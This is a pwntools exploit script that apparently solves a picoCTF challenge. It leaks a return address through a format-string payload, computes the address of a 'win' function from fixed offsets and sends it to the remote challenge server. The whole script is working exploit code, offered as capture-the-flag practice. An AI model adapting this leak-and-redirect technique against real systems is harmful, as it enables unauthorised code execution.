#!/usr/bin/env python

from pwn import *

#conn = process("./vuln")
conn = remote('rescued-float.picoctf.net', 49587)
conn.recvuntil(b'name:')
conn.sendline(b'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x.%lx')
conn.recvuntil(b'.')
return_addr = int(conn.recvline(), 16)
log.info(f"received return addr: {return_addr}")
conn.recvuntil(b'12345: ')

main_offset = 0x1400
win_offset = 0x136a
call_fun_ret_offset = 65

main_addr = return_addr - call_fun_ret_offset
win_offset = main_addr - main_offset + win_offset

conn.sendline(f'{hex(win_offset)}'.encode())
conn.recvline()
conn.interactive()